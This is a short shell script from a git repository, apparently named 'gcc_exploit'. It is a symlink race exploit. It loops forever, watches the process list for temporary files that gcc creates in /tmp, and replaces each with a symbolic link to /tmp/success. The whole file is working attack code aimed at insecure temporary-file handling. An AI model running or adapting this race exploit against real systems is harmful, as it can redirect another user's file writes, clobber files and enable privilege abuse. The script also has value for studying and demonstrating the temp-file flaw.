added link to libdl
[tridge/junkcode.git] / gcc_exploit
1 #!/bin/sh
2
3 while [ 1 ]; do
4 tmpfile=`ps auxwww | grep tmp | egrep -v 'grep|sed' | sed "s|.*/tmp/||g"`
5 if [ "$tmpfile" != "" ]; then
6  ln -s /tmp/success /tmp/$tmpfile
7 fi
8 done